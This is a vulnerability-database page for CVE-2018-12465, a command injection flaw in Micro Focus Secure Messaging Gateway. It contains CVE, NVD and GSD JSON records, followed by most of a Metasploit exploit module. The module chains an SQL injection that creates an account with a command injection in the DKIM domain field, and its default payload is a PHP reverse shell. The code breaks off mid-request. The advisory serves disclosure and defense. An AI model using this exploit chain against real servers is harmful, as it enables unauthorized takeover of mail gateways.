CVE-2018-12465 (GCVE-0-2018-12465)

Vulnerability from cvelistv5 – Published: 2018-06-29 16:00 – Updated: 2024-09-16 20:21

Title

Remote Code Execution in Micro Focus Secure Messaging Gateway

Summary

An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5).

Severity ?

9.1 (Critical)


                        
                          CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-77 - OS command injection (CWE-77)

Assigner

microfocus

References

URL

Tags

	https://support.microfocus.com/kb/doc.php?id=7023133	x_refsource_CONFIRM
	https://www.exploit-db.com/exploits/45083/	exploitx_refsource_EXPLOIT-DB
	https://pentest.blog/unexpected-journey-6-all-way…	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	Micro Focus	Secure Messaging Gateway	Affected: unspecified , < 471 (custom)

Credits

Mehmet INCE from PRODAFT

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T08:38:06.165Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://support.microfocus.com/kb/doc.php?id=7023133"
          },
          {
            "name": "45083",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/45083/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Secure Messaging Gateway",
          "vendor": "Micro Focus",
          "versions": [
            {
              "lessThan": "471",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Mehmet INCE from PRODAFT"
        }
      ],
      "datePublic": "2018-06-28T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5)."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-77",
              "description": "OS command injection (CWE-77)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-01-06T16:15:45",
        "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "shortName": "microfocus"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://support.microfocus.com/kb/doc.php?id=7023133"
        },
        {
          "name": "45083",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/45083/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Please upgrade to Secure Messaging Gateway r471 or newer using the online update tool in the Secure Messaging Gateway management console."
        }
      ],
      "source": {
        "defect": [
          "GWAV-2258"
        ],
        "discovery": "EXTERNAL"
      },
      "title": "Remote Code Execution in Micro Focus Secure Messaging Gateway",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@microfocus.com",
          "DATE_PUBLIC": "2018-06-28T16:00:00.000Z",
          "ID": "CVE-2018-12465",
          "STATE": "PUBLIC",
          "TITLE": "Remote Code Execution in Micro Focus Secure Messaging Gateway"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Secure Messaging Gateway",
                      "version": {
                        "version_data": [
                          {
                            "affected": "\u003c",
                            "version_affected": "\u003c",
                            "version_value": "471"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Micro Focus"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Mehmet INCE from PRODAFT"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5)."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "OS command injection (CWE-77)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://support.microfocus.com/kb/doc.php?id=7023133",
              "refsource": "CONFIRM",
              "url": "https://support.microfocus.com/kb/doc.php?id=7023133"
            },
            {
              "name": "45083",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/45083/"
            },
            {
              "name": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/",
              "refsource": "CONFIRM",
              "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Please upgrade to Secure Messaging Gateway r471 or newer using the online update tool in the Secure Messaging Gateway management console."
          }
        ],
        "source": {
          "defect": [
            "GWAV-2258"
          ],
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
    "assignerShortName": "microfocus",
    "cveId": "CVE-2018-12465",
    "datePublished": "2018-06-29T16:00:00Z",
    "dateReserved": "2018-06-15T00:00:00",
    "dateUpdated": "2024-09-16T20:21:55.086Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:microfocus:secure_messaging_gateway:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"471\", \"matchCriteriaId\": \"7549F67C-4E9D-4801-B4CE-E006F25CE090\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5).\"}, {\"lang\": \"es\", \"value\": \"Una vulnerabilidad de inyecci\\u00f3n de comandos arbitrarios del sistema operativo en el componente de administraci\\u00f3n web de Micro Focus Secure Messaging Gateway (SMG) permite que un atacante remoto autenticado como usuario privilegiado ejecute comandos arbitrarios del sistema operativo en el servidor SMG. Esto se puede explotar junto con CVE-2018-12464 para conseguir ejecutar c\\u00f3digo de manera remota. Esto afecta a las versiones anteriores a la 471 de Micro Focus Secure Messaging Gateway. No afecta a las versiones anteriores del producto que utilicen el nombre de producto GWAVA (por ejemplo, GWAVA 6.5.).\"}]",
      "id": "CVE-2018-12465",
      "lastModified": "2024-11-21T03:45:16.237",
      "metrics": "{\"cvssMetricV30\": [{\"source\": \"security@opentext.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.0\", \"vectorString\": \"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\", \"baseScore\": 9.1, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"userInteraction\": \"NONE\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 2.3, \"impactScore\": 6.0}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.0\", \"vectorString\": \"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 7.2, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 1.2, \"impactScore\": 5.9}], \"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:S/C:C/I:C/A:C\", \"baseScore\": 9.0, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"SINGLE\", \"confidentialityImpact\": \"COMPLETE\", \"integrityImpact\": \"COMPLETE\", \"availabilityImpact\": \"COMPLETE\"}, \"baseSeverity\": \"HIGH\", \"exploitabilityScore\": 8.0, \"impactScore\": 10.0, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2018-06-29T16:29:00.337",
      "references": "[{\"url\": \"https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\", \"source\": \"security@opentext.com\"}, {\"url\": \"https://support.microfocus.com/kb/doc.php?id=7023133\", \"source\": \"security@opentext.com\"}, {\"url\": \"https://www.exploit-db.com/exploits/45083/\", \"source\": \"security@opentext.com\"}, {\"url\": \"https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://support.microfocus.com/kb/doc.php?id=7023133\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://www.exploit-db.com/exploits/45083/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
      "sourceIdentifier": "security@opentext.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"security@opentext.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-77\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-78\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2018-12465\",\"sourceIdentifier\":\"security@opentext.com\",\"published\":\"2018-06-29T16:29:00.337\",\"lastModified\":\"2024-11-21T03:45:16.237\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5).\"},{\"lang\":\"es\",\"value\":\"Una vulnerabilidad de inyecci\u00f3n de comandos arbitrarios del sistema operativo en el componente de administraci\u00f3n web de Micro Focus Secure Messaging Gateway (SMG) permite que un atacante remoto autenticado como usuario privilegiado ejecute comandos arbitrarios del sistema operativo en el servidor SMG. Esto se puede explotar junto con CVE-2018-12464 para conseguir ejecutar c\u00f3digo de manera remota. Esto afecta a las versiones anteriores a la 471 de Micro Focus Secure Messaging Gateway. No afecta a las versiones anteriores del producto que utilicen el nombre de producto GWAVA (por ejemplo, GWAVA 6.5.).\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"security@opentext.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.3,\"impactScore\":6.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.2,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:S/C:C/I:C/A:C\",\"baseScore\":9.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"SINGLE\",\"confidentialityImpact\":\"COMPLETE\",\"integrityImpact\":\"COMPLETE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":8.0,\"impactScore\":10.0,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"security@opentext.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-77\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microfocus:secure_messaging_gateway:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"471\",\"matchCriteriaId\":\"7549F67C-4E9D-4801-B4CE-E006F25CE090\"}]}]}],\"references\":[{\"url\":\"https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\",\"source\":\"security@opentext.com\"},{\"url\":\"https://support.microfocus.com/kb/doc.php?id=7023133\",\"source\":\"security@opentext.com\"},{\"url\":\"https://www.exploit-db.com/exploits/45083/\",\"source\":\"security@opentext.com\"},{\"url\":\"https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://support.microfocus.com/kb/doc.php?id=7023133\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.exploit-db.com/exploits/45083/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

GSD-2018-12465

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

Aliases

CVE-2018-12465

Aliases

CVE-2018-12465

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2018-12465",
    "description": "An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5).",
    "id": "GSD-2018-12465",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2018-12465"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2018-12465"
      ],
      "details": "An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5).",
      "id": "GSD-2018-12465",
      "modified": "2023-12-13T01:22:29.747987Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security@microfocus.com",
        "DATE_PUBLIC": "2018-06-28T16:00:00.000Z",
        "ID": "CVE-2018-12465",
        "STATE": "PUBLIC",
        "TITLE": "Remote Code Execution in Micro Focus Secure Messaging Gateway"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "Secure Messaging Gateway",
                    "version": {
                      "version_data": [
                        {
                          "affected": "\u003c",
                          "version_value": "471"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Micro Focus"
            }
          ]
        }
      },
      "credit": [
        {
          "lang": "eng",
          "value": "Mehmet INCE from PRODAFT"
        }
      ],
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5)."
          }
        ]
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.1,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.0"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "OS command injection (CWE-77)"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://support.microfocus.com/kb/doc.php?id=7023133",
            "refsource": "CONFIRM",
            "url": "https://support.microfocus.com/kb/doc.php?id=7023133"
          },
          {
            "name": "45083",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/45083/"
          },
          {
            "name": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/",
            "refsource": "CONFIRM",
            "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
          }
        ]
      },
      "solution": [
        {
          "lang": "eng",
          "value": "Please upgrade to Secure Messaging Gateway r471 or newer using the online update tool in the Secure Messaging Gateway management console."
        }
      ],
      "source": {
        "defect": [
          "GWAV-2258"
        ],
        "discovery": "EXTERNAL"
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:microfocus:secure_messaging_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "471",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security@suse.com",
          "ID": "CVE-2018-12465"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5)."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-78"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://support.microfocus.com/kb/doc.php?id=7023133",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "https://support.microfocus.com/kb/doc.php?id=7023133"
            },
            {
              "name": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/",
              "refsource": "CONFIRM",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
            },
            {
              "name": "45083",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://www.exploit-db.com/exploits/45083/"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 8.0,
          "impactScore": 10.0,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2019-10-09T23:33Z",
      "publishedDate": "2018-06-29T16:29Z"
    }
  }
}

VAR-201806-1216

Vulnerability from variot - Updated: 2023-12-18 13:24

This module requires Metasploit: https://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={}) super(update_info(info, 'Name' => "MicroFocus Secure Messaging Gateway Remote Code Execution", 'Description' => %q{ This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging Gateway. An unauthenticated user can execute a terminal command under the context of the web user.

    One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,
    which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. 
    manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It's not possible
    to access this endpoint without having a valid session.

    Combining these vulnerabilities gives the opportunity execute operation system commands under the context
    of the web user. 
  },
  'License'        => MSF_LICENSE,
  'Author'         =>
    [
      'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
    ],
  'References'     =>
    [
      ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'],
      ['CVE', '2018-12464'],
      ['CVE', '2018-12465'],
      ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'],
      ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133']
    ],
  'DefaultOptions'  =>
    {
      'Payload' => 'php/meterpreter/reverse_tcp',
      'Encoder' => 'php/base64'
    },
  'Platform'       => ['php'],
  'Arch'           => ARCH_PHP,
  'Targets'        => [[ 'Automatic', { }]],
  'Privileged'     => false,
  'DisclosureDate' => "Jun 19 2018",
  'DefaultTarget'  => 0
))

register_options(
  [
    OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
  ]
)

end

def execute_query(query) # # We have a very rare SQLi case in here. Normally, it's would be very easy to exploit it by using time-based techniques # but since we are able to use stacked-query approach, following form of payload is required in order to be able # get back the output of query ! # sql = rand_text_alphanumeric(3 + rand(3)) sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine " sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; " sql << query sql << "; -- " sql << rand_text_alphanumeric(3 + rand(3))

send_request_cgi(
  'method'  => 'POST',
  'uri'     =>  normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
  'vars_post' => {
    'appkey' => sql
  }
)

end

def something_went_wrong fail_with Failure::Unknown, 'Something went wrong' end

def check r = rand_text_numeric(15..35) res = execute_query("SELECT #{r}") unless res vprint_error 'Connection failed' return CheckCode::Unknown end unless res.code == 200 && res.body.include?(r) return CheckCode::Safe end CheckCode::Vulnerable end

def implant_payload(cookie) print_status('Creating a domain record with a malformed DKIM data') p = [ { :id => 'temp_0', :Description => rand_text_alpha(5), :DkimList => [ { :Domain => "$(php -r '#{payload.encoded}')", :Selector => '', :TempId => 'tempDkim_1' } ] } ].to_json res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'), 'cookie' => cookie, 'vars_get' => { 'cache' => 0, }, 'vars_post' => { 'StateData' => '[{"ouid":1}]', 'SaveData' => p } })

if res && res.code == 200 && res.body.include?('DbNodeId')
  # Defining as global variable since we need to access them later within clean up function. 
  begin
    @domainid  = res.get_json_document['Nodes'][0]['DbNodeId']
    @dkimid  = res.get_json_document['Nodes'][1]['DbNodeId']
  rescue => e
    fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
  end
  print_good('Payload is successfully implanted')
else
  something_went_wrong
end

end

def create_user # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection # issue location where requires a valid session ! print_status('Creating a user with appropriate privileges')

# Defining as global variable since we need to access them later within clean up function. 
@username = rand_text_alpha_lower(5..25)
@userid = rand_text_numeric(6..8)
query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"

execute_query(query)
res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'")

if res && res.code == 200 && res.body.include?(@username)
  print_good("User successfully created. Username : #{@username}")
else
  something_went_wrong
end

end

def login print_status("Authenticating with created user") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'security', 'securitygate.php'), 'vars_post' => { 'username' => @username, 'password' => rand_text_alpha_lower(5..25), 'passwordmandatory' => rand_text_alpha_lower(5..25), 'LimitInterfaceId' => 1 } ) if res && res.code == 200 && res.body.include?('/ui/default/index.php') print_good('Successfully authenticated') cookie = res.get_cookies else something_went_wrong end cookie end

def exploit unless check == CheckCode::Vulnerable fail_with Failure::NotVulnerable, 'Target is not vulnerable' end

create_user
cookie = login
implant_payload(cookie)

print_status('Triggering an implanted payload')
send_request_cgi({
  'method' => 'POST',
